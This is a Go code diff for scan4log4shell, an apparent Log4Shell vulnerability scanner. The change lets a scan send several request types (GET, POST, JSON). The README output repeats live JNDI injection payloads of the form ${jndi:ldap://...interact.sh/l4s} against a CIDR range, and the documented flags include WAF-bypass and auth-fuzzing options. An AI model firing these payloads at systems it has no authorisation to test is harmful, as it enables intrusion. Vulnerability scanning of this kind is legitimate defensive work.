Allow multiple types

README.md

@@ -182,31 +182,32 @@ Examples:
 - Scan a complete cidr: scan4log4shell remote cidr 172.20.0.0/24
 - TCP catcher: scan4log4shell remote cidr 172.20.0.0/24 --catcher-type tcp --caddr 172.20.0.30:4444
 - Custom headers file: scan4log4shell remote cidr 172.20.0.0/24 --headers-file ./headers.txt
+- Run all tests: scan4log4shell rremote cidr 172.20.0.0/24 -t get,post,json --waf-bypass
 
 Flags:
       --auth-fuzzing            add auth fuzzing
       --basic-auth string       basic auth credentials (eg. user:pass)
       --caddr string            address to catch the callbacks (eg. ip:port)
       --catcher-type string     type of callback catcher (dns | ldap | tcp | none) (default "dns")
       --check-cve-2021-45046    check for CVE-2021-45046
-      --field stringArray       field to use
+      --field strings           field to use
       --fields-file string      use custom field from file
-      --header stringArray      header to use
+      --header strings          header to use
       --headers-file string     use custom headers from file
   -h, --help                    help for cidr
       --max-threads int         max number of concurrent threads (default 150)
       --no-redirect             do not follow redirects
       --no-user-agent-fuzzing   exclude user-agent header from fuzzing
       --no-wait-timeout         wait forever for callbacks
-      --payload stringArray     payload to use
+      --payload strings         payload to use
       --payloads-file string    use custom payloads from file
-  -p, --port stringArray        port to scan (default [8080])
+  -p, --port strings            port to scan (default [8080])
       --proxy string            proxy url
   -r, --resource string         resource in payload (default "l4s")
       --schema string           schema to use for requests (default "https")
       --submit-forms            add form submits to fuzzing
       --timeout duration        time limit for requests (default 3s)
-  -t, --type string             get, post or json (default "get")
+  -t, --type strings            get, post or json (default [get])
       --waf-bypass              extend scans with WAF bypass payload
   -w, --wait duration           wait time to catch callbacks (default 5s)
 
@@ -228,29 +229,30 @@ Examples:
 - TCP catcher: scan4log4shell remote url https://target.org --catcher-type tcp --caddr 172.20.0.30:4444
 - Custom headers file: scan4log4shell remote url https://target.org --headers-file ./headers.txt
 - Scan url behind basic auth: scan4log4shell remote url https://target.org --basic-auth user:pass
+- Run all tests: scan4log4shell remote url https://target.org -t get,post,json --waf-bypass
 
 Flags:
       --auth-fuzzing            add auth fuzzing
       --basic-auth string       basic auth credentials (eg. user:pass)
       --caddr string            address to catch the callbacks (eg. ip:port)
       --catcher-type string     type of callback catcher (dns | ldap | tcp | none) (default "dns")
       --check-cve-2021-45046    check for CVE-2021-45046
-      --field stringArray       field to use
+      --field strings           field to use
       --fields-file string      use custom field from file
-      --header stringArray      header to use
+      --header strings          header to use
       --headers-file string     use custom headers from file
   -h, --help                    help for url
       --max-threads int         max number of concurrent threads (default 150)
       --no-redirect             do not follow redirects
       --no-user-agent-fuzzing   exclude user-agent header from fuzzing
       --no-wait-timeout         wait forever for callbacks
-      --payload stringArray     payload to use
+      --payload strings         payload to use
       --payloads-file string    use custom payloads from file
       --proxy string            proxy url
   -r, --resource string         resource in payload (default "l4s")
       --submit-forms            add form submits to fuzzing
       --timeout duration        time limit for requests (default 3s)
-  -t, --type string             get, post or json (default "get")
+  -t, --type strings            get, post or json (default [get])
       --waf-bypass              extend scans with WAF bypass payload
   -w, --wait duration           wait time to catch callbacks (default 5s)
 
@@ -267,23 +269,23 @@ scanner_1  | [i] Log4Shell Remote Vulnerability Scan
 scanner_1  | [i] Listening on c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh
 scanner_1  | [i] Start scanning CIDR 172.20.0.0/24
 scanner_1  | ---------
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.0:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.1:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.2:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.3:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.4:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.5:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.6:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.7:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.8:8080
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.0:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.1:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.2:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.3:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.4:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.5:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.6:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.7:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.8:8080 [GET]
 scanner_1  | [!] Possibly vulnerable host identified: 172.20.0.3
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.9:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.10:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.11:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.12:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.13:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.14:8080
-scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.15:8080
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.9:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.10:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.11:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.12:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.13:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.14:8080 [GET]
+scanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.15:8080 [GET]
 scanner_1  | [!] Possibly vulnerable host identified: 172.20.0.13
 ```
 

cmd/remote.go

@@ -21,7 +21,7 @@ const (
 type remoteOptions struct {
 	basicAuth          string
 	caddr              string
-	requestType        string
+	requestTypes       []string
 	proxy              string
 	catcherType        string
 	resource           string
@@ -65,7 +65,7 @@ func addRemoteFlags(cmd *cobra.Command, opts *remoteOptions) {
 	cmd.Flags().StringVarP(&opts.payloadsFile, "payloads-file", "", "", "use custom payloads from file")
 	cmd.Flags().StringVarP(&opts.basicAuth, "basic-auth", "", "", "basic auth credentials (eg. user:pass)")
 	cmd.Flags().StringVarP(&opts.caddr, "caddr", "", "", "address to catch the callbacks (eg. ip:port)")
-	cmd.Flags().StringVarP(&opts.requestType, "type", "t", "get", "get, post or json")
+	cmd.Flags().StringSliceVarP(&opts.requestTypes, "type", "t", []string{"get"}, "get, post or json")
 	cmd.Flags().StringVarP(&opts.proxy, "proxy", "", "", "proxy url")
 	cmd.Flags().StringVarP(&opts.resource, "resource", "r", "l4s", "resource in payload")
 	cmd.Flags().StringVarP(&opts.catcherType, "catcher-type", "", "dns", "type of callback catcher (dns | ldap | tcp | none)")
@@ -79,9 +79,9 @@ func addRemoteFlags(cmd *cobra.Command, opts *remoteOptions) {
 	cmd.Flags().DurationVarP(&opts.timeout, "timeout", "", 3*time.Second, "time limit for requests")
 	cmd.Flags().IntVarP(&opts.maxThreads, "max-threads", "", 150, "max number of concurrent threads")
 	cmd.Flags().BoolVarP(&opts.checkCVE2021_45046, "check-cve-2021-45046", "", false, "check for CVE-2021-45046")
-	cmd.Flags().StringArrayVarP(&opts.headers, "header", "", nil, "header to use")
-	cmd.Flags().StringArrayVarP(&opts.fields, "field", "", nil, "field to use")
-	cmd.Flags().StringArrayVarP(&opts.payloads, "payload", "", nil, "payload to use")
+	cmd.Flags().StringSliceVarP(&opts.headers, "header", "", nil, "header to use")
+	cmd.Flags().StringSliceVarP(&opts.fields, "field", "", nil, "field to use")
+	cmd.Flags().StringSliceVarP(&opts.payloads, "payload", "", nil, "payload to use")
 }
 
 var unauthorizedHandler = func(verbose bool) internal.StatusCodeHandlerFunc {

cmd/remote_cidr.go

@@ -31,7 +31,8 @@ func newRemoteCIDRCmd(noColor *bool, output *string, verbose *bool) *cobra.Comma
 		Args:  cobra.MinimumNArgs(1),
 		Example: `- Scan a complete cidr: scan4log4shell remote cidr 172.20.0.0/24
 - TCP catcher: scan4log4shell remote cidr 172.20.0.0/24 --catcher-type tcp --caddr 172.20.0.30:4444
-- Custom headers file: scan4log4shell remote cidr 172.20.0.0/24 --headers-file ./headers.txt`,
+- Custom headers file: scan4log4shell remote cidr 172.20.0.0/24 --headers-file ./headers.txt
+- Run all tests: scan4log4shell rremote cidr 172.20.0.0/24 -t get,post,json --waf-bypass`,
 		SilenceUsage:  true,
 		SilenceErrors: true,
 		RunE: func(cmd *cobra.Command, args []string) error {
@@ -65,7 +66,7 @@ func newRemoteCIDRCmd(noColor *bool, output *string, verbose *bool) *cobra.Comma
 				BasicAuth:          opts.basicAuth,
 				CADDR:              opts.caddr,
 				Resource:           opts.resource,
-				RequestType:        strings.ToLower(opts.requestType),
+				RequestTypes:       opts.requestTypes,
 				NoUserAgentFuzzing: opts.noUserAgentFuzzing,
 				NoRedirect:         opts.noRedirect,
 				WafBypass:          opts.wafBypass,
@@ -128,13 +129,13 @@ func newRemoteCIDRCmd(noColor *bool, output *string, verbose *bool) *cobra.Comma
 
 			errs := make(chan error)
 
-			if err := scanner.CIDRWalk(cidr, opts.schema, opts.ports, func(url, payload string) error {
+			if err := scanner.CIDRWalk(cidr, opts.schema, opts.ports, func(method, url, payload string) error {
 				if err := sem.Acquire(ctx, 1); err != nil {
 					return err
 				}
 
 				if *verbose {
-					printInfo("Checking %s for %s", payload, url)
+					printInfo("Checking %s for %s [%s]", payload, url, strings.ToUpper(method))
 				}
 
 				wg.Add(1)
@@ -145,7 +146,7 @@ func newRemoteCIDRCmd(noColor *bool, output *string, verbose *bool) *cobra.Comma
 						sem.Release(1)
 					}()
 
-					if err := scanner.Scan(ctx, opts.requestType, url, payload); err != nil {
+					if err := scanner.Scan(ctx, method, url, payload); err != nil {
 						errs <- err
 					}
 				}()
@@ -190,7 +191,7 @@ func newRemoteCIDRCmd(noColor *bool, output *string, verbose *bool) *cobra.Comma
 
 	addRemoteFlags(cmd, &opts.remoteOptions)
 	cmd.Flags().StringVarP(&opts.schema, "schema", "", "https", "schema to use for requests")
-	cmd.Flags().StringArrayVarP(&opts.ports, "port", "p", []string{"8080"}, "port to scan")
+	cmd.Flags().StringSliceVarP(&opts.ports, "port", "p", []string{"8080"}, "port to scan")
 
 	return cmd
 }

cmd/remote_url.go

@@ -31,7 +31,8 @@ func newRemoteURLCmd(noColor *bool, output *string, verbose *bool) *cobra.Comman
 - Scan multiple urls: scan4log4shell remote url https://target1.org https://target2.org
 - TCP catcher: scan4log4shell remote url https://target.org --catcher-type tcp --caddr 172.20.0.30:4444
 - Custom headers file: scan4log4shell remote url https://target.org --headers-file ./headers.txt
-- Scan url behind basic auth: scan4log4shell remote url https://target.org --basic-auth user:pass`,
+- Scan url behind basic auth: scan4log4shell remote url https://target.org --basic-auth user:pass
+- Run all tests: scan4log4shell remote url https://target.org -t get,post,json --waf-bypass`,
 		SilenceUsage:  true,
 		SilenceErrors: true,
 		RunE: func(cmd *cobra.Command, args []string) error {
@@ -63,7 +64,7 @@ func newRemoteURLCmd(noColor *bool, output *string, verbose *bool) *cobra.Comman
 				BasicAuth:          opts.basicAuth,
 				CADDR:              opts.caddr,
 				Resource:           opts.resource,
-				RequestType:        strings.ToLower(opts.requestType),
+				RequestTypes:       opts.requestTypes,
 				NoUserAgentFuzzing: opts.noUserAgentFuzzing,
 				NoRedirect:         opts.noRedirect,
 				WafBypass:          opts.wafBypass,
@@ -127,26 +128,28 @@ func newRemoteURLCmd(noColor *bool, output *string, verbose *bool) *cobra.Comman
 				printInfo("Start scanning CIDR %s\n---------", targetURL)
 
 				for _, payload := range scanner.Payloads() {
-					if err := sem.Acquire(ctx, 1); err != nil {
-						return err
-					}
+					for _, method := range opts.requestTypes {
+						if err := sem.Acquire(ctx, 1); err != nil {
+							return err
+						}
 
-					if *verbose {
-						printInfo("Checking %s for %s", payload, targetURL)
-					}
+						if *verbose {
+							printInfo("Checking %s for %s [%s]", payload, targetURL, strings.ToUpper(method))
+						}
 
-					wg.Add(1)
+						wg.Add(1)
 
-					go func(targetURL, payload string) {
-						defer func() {
-							wg.Done()
-							sem.Release(1)
-						}()
+						go func(method, targetURL, payload string) {
+							defer func() {
+								wg.Done()
+								sem.Release(1)
+							}()
 
-						if err := scanner.Scan(ctx, opts.requestType, targetURL, payload); err != nil {
-							errs <- err
-						}
-					}(targetURL, payload)
+							if err := scanner.Scan(ctx, strings.ToLower(method), targetURL, payload); err != nil {
+								errs <- err
+							}
+						}(method, targetURL, payload)
+					}
 				}
 
 				printInfo("All request to %s have been sent", targetURL)

internal/remote.go

@@ -28,7 +28,7 @@ type StatusCodeHandlerFunc func(ctx context.Context, client *http.Client, resp *
 type RemoteOptions struct {
 	BasicAuth          string
 	CADDR              string
-	RequestType        string
+	RequestTypes       []string
 	Proxies            []*url.URL
 	Resource           string
 	NoUserAgentFuzzing bool
@@ -75,7 +75,7 @@ func NewRemoteScanner(opts *RemoteOptions) (*RemoteScanner, error) {
 	}, nil
 }
 
-func (rs *RemoteScanner) CIDRWalk(cidr, schema string, ports []string, fn func(url, payload string) error) error {
+func (rs *RemoteScanner) CIDRWalk(cidr, schema string, ports []string, fn func(method, url, payload string) error) error {
 	_, ipv4Net, err := net.ParseCIDR(cidr)
 	if err != nil {
 		return err
@@ -94,8 +94,10 @@ func (rs *RemoteScanner) CIDRWalk(cidr, schema string, ports []string, fn func(u
 			url := fmt.Sprintf("%s://%s:%s", schema, ip, p)
 
 			for _, p := range rs.payloads {
-				if err := fn(url, p); err != nil {
-					return err
+				for _, t := range rs.opts.RequestTypes {
+					if err := fn(strings.ToLower(t), url, p); err != nil {
+						return err
+					}
 				}
 			}
 		}